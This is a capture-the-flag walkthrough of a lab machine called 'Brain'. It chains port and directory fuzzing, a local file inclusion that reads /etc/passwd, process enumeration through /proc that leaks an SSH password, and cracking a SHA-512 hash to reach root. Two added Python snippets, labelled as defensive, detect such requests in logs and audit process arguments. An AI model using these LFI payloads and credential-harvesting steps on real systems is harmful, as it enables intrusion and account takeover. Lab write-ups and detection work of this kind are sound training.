This machine was created by d4t4s3c

Port scanning with nmap, or you can use recon

┌──(root@ghost)-[/home/ghost]
└─# recon brain.hmvm

    .o oOOOOOOOo                                            OOOo
    Ob.OOOOOOOo  OOOo.      oOOo.                      .adOOOOOOO
    OboO"""""""""""".OOo. .oOOOOOo.    OOOo.oOOOOOo.."""""""""'OO
    OOP.oOOOOOOOOOOO "POOOOOOOOOOOo.   `"OOOOOOOOOP,OOOOOOOOOOOB'
    `O'OOOO'     `OOOOo"OOOOOOOOOOO` .adOOOOOOOOO"oOOO'    `OOOOo
    .OOOO'            `OOOOOOOOOOOOOOOOOOOOOOOOOO'            `OO
    OOOOO                 '"OOOOOOOOOOOOOOOO"`                oOO
   oOOOOOba.                .adOOOOOOOOOOba               .adOOOOo.
  oOOOOOOOOOOOOOba.    .adOOOOOOOOOO@^OOOOOOOba.     .adOOOOOOOOOOOO
 OOOOOOOOOOOOOOOOO.OOOOOOOOOOOOOO"`  '"OOOOOOOOOOOOO.OOOOOOOOOOOOOO
 "OOOO"       "YOoOOOOMOIONODOO"`  .   '"OOROAOPOEOOOoOY"     "OOO"
    Y           'OOOOOOOOOOOOOO: .oOOo. :OOOOOOOOOOO?'         :`
    :            .oO%OOOOOOOOOOo.OOOOOO.oOOOOOOOOOOOO?         .
    .            oOOP"%OOOOOOOOoOOOOOOO?oOOOOO?OOOO"OOo
                 '%o  OOOO"%OOOO%"%OOOOO"OOOOOO"OOO':
                      `$"  `OOOO' `O"Y ' `OOOO'  o             .
    .                  .     OP"          : o     .
                              :
                              .

[R3C0N] by 0bfxgh0st 4 WWA with ❤

[OS] Linux (99%)
Starting Nmap 7.92 ( https://nmap.org ) at 2022-09-20 10:50 EDT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 10:50
Completed NSE at 10:50, 0.00s elapsed
Initiating ARP Ping Scan at 10:50
Scanning 10.0.2.24 [1 port]
Completed ARP Ping Scan at 10:50, 0.03s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 10:50
Scanning brain.hmvm (10.0.2.24) [65535 ports]
Discovered open port 22/tcp on 10.0.2.24
Discovered open port 80/tcp on 10.0.2.24
Completed SYN Stealth Scan at 10:50, 1.48s elapsed (65535 total ports)
NSE: Script scanning 10.0.2.24.
Initiating NSE at 10:50
Completed NSE at 10:50, 0.00s elapsed
Nmap scan report for brain.hmvm (10.0.2.24)
Host is up (0.000062s latency).
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
80/tcp open  http
MAC Address: 08:00:27:33:41:58 (Oracle VirtualBox virtual NIC)

NSE: Script Post-scanning.
Initiating NSE at 10:50
Completed NSE at 10:50, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 1.72 seconds
           Raw packets sent: 65536 (2.884MB) | Rcvd: 65536 (2.621MB)


[i] [Server info]
http://10.0.2.24:80 [200 OK] Apache[2.4.38], Country[RESERVED][ZZ], HTTPServer[Debian Linux][Apache/2.4.38 (Debian)], IP[10.0.2.24], Title[Apache2 Debian Default Page: It works]

[+] [fuzzin server]

-----------------
DIRB v2.22    
By The Dark Raver
-----------------

START_TIME: Tue Sep 20 10:50:10 2022
URL_BASE: http://10.0.2.24:80/
WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
OPTION: Not Recursive

-----------------

GENERATED WORDS: 4612                                                          

---- Scanning URL: http://10.0.2.24:80/ ----
+ http://10.0.2.24:80/index.html (CODE:200|SIZE:10701)                                                                                                                                            
+ http://10.0.2.24:80/robots.txt (CODE:200|SIZE:162)                                                                                                                                              
+ http://10.0.2.24:80/server-status (CODE:403|SIZE:274)                                                                                                                                           
                                                                                                                                                                                                  
-----------------
END_TIME: Tue Sep 20 10:50:11 2022
DOWNLOADED: 4612 - FOUND: 3

recon reports two open ports: 22 for SSH and 80 for HTTP

┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://brain.hmvm/FUZZ
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://brain.hmvm/FUZZ
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                           
=====================================================================

000000007:   200        368 L    933 W      10701 Ch    "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                                                 
000000014:   200        368 L    933 W      10701 Ch    "http://brain.hmvm/"                                                                                                              
000000013:   200        368 L    933 W      10701 Ch    "#"                                                                                                                               
000000012:   200        368 L    933 W      10701 Ch    "# on atleast 2 different hosts"                                                                                                  
000000011:   200        368 L    933 W      10701 Ch    "# Priority ordered case sensative list, where entries were found"                                                                
000000010:   200        368 L    933 W      10701 Ch    "#"                                                                                                                               
000000006:   200        368 L    933 W      10701 Ch    "# Attribution-Share Alike 3.0 License. To view a copy of this"                                                                   
000000008:   200        368 L    933 W      10701 Ch    "# or send a letter to Creative Commons, 171 Second Street,"                                                                      
000000002:   200        368 L    933 W      10701 Ch    "#"                                                                                                                               
000000005:   200        368 L    933 W      10701 Ch    "# This work is licensed under the Creative Commons"                                                                              
000000004:   200        368 L    933 W      10701 Ch    "#"                                                                                                                               
000000009:   200        368 L    933 W      10701 Ch    "# Suite 300, San Francisco, California, 94105, USA."                                                                             
000000001:   200        368 L    933 W      10701 Ch    "# directory-list-2.3-medium.txt"                                                                                                 
000000003:   200        368 L    933 W      10701 Ch    "# Copyright 2007 James Fisher"                                                                                                   
000014961:   301        9 L      28 W       313 Ch      "brainstorm"                                                                                                                      
000045240:   200        368 L    933 W      10701 Ch    "http://brain.hmvm/"                                                                                                              
000095524:   403        9 L      28 W       275 Ch      "server-status"                                                                                                                   

Total time: 0
Processed Requests: 220560
Filtered Requests: 220543
Requests/sec.: 0

Found the brainstorm directory

┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt http://brain.hmvm/brainstorm/FUZZ.php
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://brain.hmvm/brainstorm/FUZZ.php
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                           
=====================================================================

000000001:   200        4 L      7 W        80 Ch       "# directory-list-2.3-medium.txt"                                                                                                 
000000003:   200        4 L      7 W        80 Ch       "# Copyright 2007 James Fisher"                                                                                                   
000000007:   200        4 L      7 W        80 Ch       "# license, visit http://creativecommons.org/licenses/by-sa/3.0/"                                                                 
000000011:   200        4 L      7 W        80 Ch       "# Priority ordered case sensative list, where entries were found"                                                                
000000014:   403        9 L      28 W       275 Ch      "http://brain.hmvm/brainstorm/.php"                                                                                               
000000012:   200        4 L      7 W        80 Ch       "# on atleast 2 different hosts"                                                                                                  
000000013:   200        4 L      7 W        80 Ch       "#"                                                                                                                               
000000006:   200        4 L      7 W        80 Ch       "# Attribution-Share Alike 3.0 License. To view a copy of this"                                                                   
000000010:   200        4 L      7 W        80 Ch       "#"                                                                                                                               
000000008:   200        4 L      7 W        80 Ch       "# or send a letter to Creative Commons, 171 Second Street,"                                                                      
000000009:   200        4 L      7 W        80 Ch       "# Suite 300, San Francisco, California, 94105, USA."                                                                             
000000005:   200        4 L      7 W        80 Ch       "# This work is licensed under the Creative Commons"                                                                              
000000002:   200        4 L      7 W        80 Ch       "#"                                                                                                                               
000000004:   200        4 L      7 W        80 Ch       "#"                                                                                                                               
000000759:   200        0 L      0 W        0 Ch        "file"                                                                                                                            
000045240:   403        9 L      28 W       275 Ch      "http://brain.hmvm/brainstorm/.php"                                                                                               

Total time: 0
Processed Requests: 220560
Filtered Requests: 220544
Requests/sec.: 0

Found the file /brainstorm/file.php

┌──(root@ghost)-[/home/ghost]
└─# wfuzz --hh=0 --hc=404 -w /usr/share/dirbuster/wordlists/directory-list-2.3-medium.txt 'http://brain.hmvm/brainstorm/file.php?FUZZ=/etc/passwd'
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://brain.hmvm/brainstorm/file.php?FUZZ=/etc/passwd
Total requests: 220560

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                                                            
=====================================================================

000000759:   200        26 L     38 W       1401 Ch     "file"                                                                                                                             

Total time: 0
Processed Requests: 220560
Filtered Requests: 220559
Requests/sec.: 0

Using wfuzz to find an LFI

┌──(root@ghost)-[/home/ghost]
└─# curl 'http://brain.hmvm/brainstorm/file.php?file=/etc/passwd'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:101:102:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
systemd-network:x:102:103:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:103:104:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:104:110::/nonexistent:/usr/sbin/nologin
sshd:x:105:65534::/run/sshd:/usr/sbin/nologin
salomon:x:1000:1000:salomon,,,:/home/salomon:/bin/bash
systemd-coredump:x:999:999:systemd Core Dumper:/:/usr/sbin/nologin

Here is the LFI
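What these requests look like from the server side, as an added detection example (not part of the original write-up): it scans access-log lines for query values that resolve to local file paths and for one client trying many parameter names against one script, as the wfuzz run above does. The log lines are constructed, and the last field is assumed to be the response body size (Apache `%b`).

```python
import re
from collections import defaultdict
from urllib.parse import parse_qsl, urlsplit

# Constructed access-log lines modelled on the requests in this write-up.
SAMPLE_LOG = """\
10.0.2.15 - - [20/Sep/2022:10:55:01 -0400] "GET /brainstorm/file.php?index=/etc/passwd HTTP/1.1" 200 -
10.0.2.15 - - [20/Sep/2022:10:55:01 -0400] "GET /brainstorm/file.php?images=/etc/passwd HTTP/1.1" 200 -
10.0.2.15 - - [20/Sep/2022:10:55:02 -0400] "GET /brainstorm/file.php?file=/etc/passwd HTTP/1.1" 200 1401
10.0.2.15 - - [20/Sep/2022:10:56:10 -0400] "GET /brainstorm/file.php?file=%2Fproc%2F365%2Fcmdline HTTP/1.1" 200 38
10.0.2.30 - - [20/Sep/2022:10:57:00 -0400] "GET /brainstorm/file.php?file=notes.txt HTTP/1.1" 200 -
10.0.2.30 - - [20/Sep/2022:10:57:05 -0400] "GET /index.html HTTP/1.1" 200 10701
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[[^\]]+\] "[A-Z]+ (\S+) [^"]*" (\d{3}) (\d+|-)')
# Decoded parameter values that look like local paths: traversal or sensitive roots.
PATH_RE = re.compile(r"(?:^|/)\.\./|^/(?:etc|proc|root|home|var/log)/")


def parse_line(line):
    """Return (client, script, [(param, value)], status, body_bytes) or None."""
    m = LINE_RE.match(line)
    if m is None:
        return None
    client, target, status, size = m.groups()
    url = urlsplit(target)
    # parse_qsl percent-decodes, so %2Fetc%2Fpasswd is seen as /etc/passwd.
    params = parse_qsl(url.query, keep_blank_values=True)
    return client, url.path, params, int(status), 0 if size == "-" else int(size)


def analyse(log_text, fuzz_threshold=3):
    """Find file-path parameter values and parameter-name fuzzing per client/script."""
    hits = []
    names = defaultdict(set)
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        client, script, params, status, size = rec
        for name, value in params:
            if PATH_RE.search(value):
                names[(client, script)].add(name)
                hits.append({"client": client, "script": script, "param": name,
                             "value": value, "served": status == 200 and size > 0})
    fuzzed = {k: sorted(v) for k, v in names.items() if len(v) >= fuzz_threshold}
    return hits, fuzzed


if __name__ == "__main__":
    hits, fuzzed = analyse(SAMPLE_LOG)
    for h in hits:
        flag = "CONTENT RETURNED" if h["served"] else "empty response"
        print(f'{h["client"]} {h["script"]} {h["param"]}={h["value"]} -> {flag}')
    for (client, script), params in fuzzed.items():
        print(f"{client} tried {len(params)} parameter names on {script}: {params}")
```

A hit with `served` set is the one to triage first: the script answered a path-like value with a non-empty body.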

┌──(root@ghost)-[/home/ghost]
└─# lfienum "http://brain.hmvm/brainstorm/file.php?file=" --pid
lfiǝnum ~by 0bfxgh0st*

Bruteforcing 0-999 PIDS (please ignore junk data)
PID 1: /sbin/init
PID 218: /lib/systemd/systemd-journald
PID 238: /lib/systemd/systemd-udevd
PID 260: /lib/systemd/systemd-timesyncd
PID 296: /lib/systemd/systemd-timesyncd
PID 317: /usr/bin/dbus-daemon--system--address=systemd:--nofork--nopidfile--systemd-activation--syslog-only
PID 326: /usr/sbin/rsyslogd-n-iNONE
PID 329: /lib/systemd/systemd-logind
PID 331: /usr/sbin/cron-f
PID 340: /usr/sbin/CRON-f
PID 342: /usr/sbin/rsyslogd-n-iNONE
PID 343: /usr/sbin/rsyslogd-n-iNONE
PID 346: /sbin/dhclient-4-v-i-pf/run/dhclient.enp0s3.pid-lf/var/lib/dhcp/dhclient.enp0s3.leases-I-df/var/lib/dhcp/dhclient6.enp0s3.leasesenp0s3
PID 348: /usr/sbin/rsyslogd-n-iNONE
PID 365: /bin/sh-c/root/.debug/salomon:MyBr4iN
PID 371: /bin/bash/root/.debug/salomon:MyBr4iN
PID 385: /sbin/agetty-o-p -- \u--nocleartty1linux
PID 388: python/root/server.py127.0.0.1:65000
PID 389: sleep999999999999999
PID 398: /usr/sbin/sshd-D
PID 426: /usr/sbin/apache2-kstart
PID 708: /usr/sbin/apache2-kstart
PID 784: /usr/sbin/apache2-kstart
PID 788: /usr/sbin/apache2-kstart

After enumerating processes with lfienum, we found salomon:MyBr4iN and python /root/server.py 127.0.0.1:65000 (keep this local server in mind for elevating to root later)
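The exposure behind this finding is that process arguments are readable by other local users through /proc, so a credential passed on a command line leaks to anything that can read files. An added audit example (not from the original write-up) that splits NUL-separated cmdline data and flags credential-like arguments; the sample data is constructed, and its argument boundaries are an assumption because the output above has the separators stripped.

```python
import glob
import re

# Constructed samples modelled on the process list above (argument boundaries assumed).
SAMPLE_CMDLINES = {
    331: b"/usr/sbin/cron\x00-f\x00",
    371: b"/bin/bash\x00/root/.debug\x00salomon:MyBr4iN\x00",
    388: b"python\x00/root/server.py\x00127.0.0.1:65000\x00",
    398: b"/usr/sbin/sshd\x00-D\x00",
}
SAMPLE_PASSWD = (
    "root:x:0:0:root:/root:/bin/bash\n"
    "www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin\n"
    "salomon:x:1000:1000:salomon,,,:/home/salomon:/bin/bash\n"
)

CRED_PATTERNS = [
    ("user:secret", re.compile(r"^(?P<user>[a-z_][a-z0-9_-]*):(?P<secret>[^\s:/]{4,})$")),
    ("password flag", re.compile(r"^--?(?:password|passwd|pass|token|secret)[=:](?P<secret>.+)$", re.I)),
]


def login_users(passwd_text):
    """Accounts from passwd-format text whose shell allows an interactive login."""
    users = set()
    for line in passwd_text.splitlines():
        fields = line.split(":")
        if len(fields) == 7 and not fields[6].endswith(("nologin", "false", "sync")):
            users.add(fields[0])
    return users


def split_cmdline(raw):
    """/proc/<pid>/cmdline is argv joined by NUL bytes; split it back into arguments."""
    return [a.decode("utf-8", "replace") for a in raw.split(b"\x00") if a]


def read_proc_cmdlines():
    """Collect cmdline data for every process visible to the current user."""
    out = {}
    for path in glob.glob("/proc/[0-9]*/cmdline"):
        try:
            with open(path, "rb") as fh:
                out[int(path.split("/")[2])] = fh.read()
        except OSError:
            continue  # process exited or access denied
    return out


def audit(cmdlines, local_users):
    """Return findings for arguments that look like credentials, with the secret redacted."""
    findings = []
    for pid, raw in sorted(cmdlines.items()):
        argv = split_cmdline(raw)
        for arg in argv[1:]:
            for kind, rx in CRED_PATTERNS:
                m = rx.match(arg)
                if m is None:
                    continue
                # Only report user:secret tokens whose user is a real login account.
                if kind == "user:secret" and m.group("user") not in local_users:
                    continue
                redacted = arg[:m.start("secret")] + "<redacted>"
                findings.append({"pid": pid, "exe": argv[0], "kind": kind, "arg": redacted})
                break
    return findings
```

On a live host, call `audit(read_proc_cmdlines(), login_users(open("/etc/passwd").read()))` from an unprivileged account to see what that account can learn.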

┌──(root@ghost)-[/home/ghost]
└─# ssh salomon@brain.hmvm
The authenticity of host 'brain.hmvm (10.0.2.24)' can't be established.
ED25519 key fingerprint is SHA256:fkqq58u/sGpESMAWndC860Dp3sVGoKVkrQdlahLQV5A.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'brain.hmvm' (ED25519) to the list of known hosts.
salomon@brain.hmvm's password: 
Linux Brain 4.19.0-13-amd64 #1 SMP Debian 4.19.160-2 (2020-11-28) x86_64

BBBBBBBBBBBBBBBBB      RRRRRRRRRRRRRRRRR                     AAA                  IIIIIIIIII   NNNNNNNN        NNNNNNNN
B::::::::::::::::B     R::::::::::::::::R                   A:::A                 I::::::::I   N:::::::N       N::::::N
B::::::BBBBBB:::::B    R::::::RRRRRR:::::R                 A:::::A                I::::::::I   N::::::::N      N::::::N
BB:::::B     B:::::B   RR:::::R     R:::::R               A:::::::A               II::::::II   N:::::::::N     N::::::N
  B::::B     B:::::B     R::::R     R:::::R              A:::::::::A                I::::I     N::::::::::N    N::::::N
  B::::B     B:::::B     R::::R     R:::::R             A:::::A:::::A               I::::I     N:::::::::::N   N::::::N
  B::::BBBBBB:::::B      R::::RRRRRR:::::R             A:::::A A:::::A              I::::I     N:::::::N::::N  N::::::N
  B:::::::::::::BB       R:::::::::::::RR             A:::::A   A:::::A             I::::I     N::::::N N::::N N::::::N
  B::::BBBBBB:::::B      R::::RRRRRR:::::R           A:::::A     A:::::A            I::::I     N::::::N  N::::N:::::::N
  B::::B     B:::::B     R::::R     R:::::R         A:::::AAAAAAAAA:::::A           I::::I     N::::::N   N:::::::::::N
  B::::B     B:::::B     R::::R     R:::::R        A:::::::::::::::::::::A          I::::I     N::::::N    N::::::::::N
  B::::B     B:::::B     R::::R     R:::::R       A:::::AAAAAAAAAAAAA:::::A         I::::I     N::::::N     N:::::::::N
BB:::::BBBBBB::::::B   RR:::::R     R:::::R      A:::::A             A:::::A      II::::::II   N::::::N      N::::::::N
B:::::::::::::::::B    R::::::R     R:::::R     A:::::A               A:::::A     I::::::::I   N::::::N       N:::::::N
B::::::::::::::::B     R::::::R     R:::::R    A:::::A                 A:::::A    I::::::::I   N::::::N        N::::::N
BBBBBBBBBBBBBBBBB      RRRRRRRR     RRRRRRR   AAAAAAA                   AAAAAAA   IIIIIIIIII   NNNNNNNN         NNNNNNN


salomon@Brain:~$ cat user.txt
onSs045i6lJ3vDtARf4k3f1467wZu3I8HKY8syrhQ

We are on the machine as salomon over SSH. Time to escalate to root


salomon@Brain:~$ ss -tunl
Netid                 State                  Recv-Q                 Send-Q                                  Local Address:Port                                    Peer Address:Port                 
udp                   UNCONN                 0                      0                                             0.0.0.0:68                                           0.0.0.0:*                    
tcp                   LISTEN                 0                      5                                           127.0.0.1:65000                                        0.0.0.0:*                    
tcp                   LISTEN                 0                      128                                           0.0.0.0:22                                           0.0.0.0:*                    
tcp                   LISTEN                 0                      128                                                 *:80                                                 *:*                    
tcp                   LISTEN                 0                      128                                              [::]:22                                              [::]:*

salomon@Brain:~$ nc 127.0.0.1 65000
GET / HTTP/1.0

HTTP/1.0 200 OK
Server: SimpleHTTP/0.6 Python/2.7.16
Date: Tue, 20 Sep 2022 15:34:05 GMT
Content-type: text/html
Content-Length: 192
Last-Modified: Tue, 26 Jan 2021 11:20:06 GMT

[+] You are a great Hacker!! I think you are looking for this:
065BB0B9A0C654E5B3B6292C4698BD67CE6A331209D941989EC4D728FBE3290E47D2058839215BBE6144F51E7FCE8A8C6A5626E0CB7521641D742251F5A17167

┌──(root@ghost)-[/home/ghost]
└─# hash-identifier
   #########################################################################
   #     __  __                     __           ______    _____           #
   #    /\ \/\ \                   /\ \         /\__  _\  /\  _ `\         #
   #    \ \ \_\ \     __      ____ \ \ \___     \/_/\ \/  \ \ \/\ \        #
   #     \ \  _  \  /'__`\   / ,__\ \ \  _ `\      \ \ \   \ \ \ \ \       #
   #      \ \ \ \ \/\ \_\ \_/\__, `\ \ \ \ \ \      \_\ \__ \ \ \_\ \      #
   #       \ \_\ \_\ \___ \_\/\____/  \ \_\ \_\     /\_____\ \ \____/      #
   #        \/_/\/_/\/__/\/_/\/___/    \/_/\/_/     \/_____/  \/___/  v1.2 #
   #                                                             By Zion3R #
   #                                                    www.Blackploit.com #
   #                                                   Root@Blackploit.com #
   #########################################################################
--------------------------------------------------
 HASH: 065BB0B9A0C654E5B3B6292C4698BD67CE6A331209D941989EC4D728FBE3290E47D2058839215BBE6144F51E7FCE8A8C6A5626E0CB7521641D742251F5A17167

Possible Hashs:
[+] SHA-512
[+] Whirlpool

Least Possible Hashs:
[+] SHA-512(HMAC)
[+] Whirlpool(HMAC)
--------------------------------------------------

┌──(root@ghost)-[/home/ghost]
└─# john --format=RAW-SHA512 --wordlist=rockyou.txt hash
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-SHA512 [SHA512 256/256 AVX2 4x])
Press 'q' or Ctrl-C to abort, almost any other key for status
gemini           (?)     
1g 0:00:00:00 DONE (2022-09-20 11:38) 33.33g/s 8533p/s 8533c/s 8533C/s 123456..freedom
Use the "--show" option to display all of the cracked passwords reliably
Session completed.

salomon@Brain:~$ su root
Contraseña: 
root@Brain:/home/salomon# cat /root/root.txt
gmC9G4598djf4k3f146UqxXj8zCx3baoUWM39sdk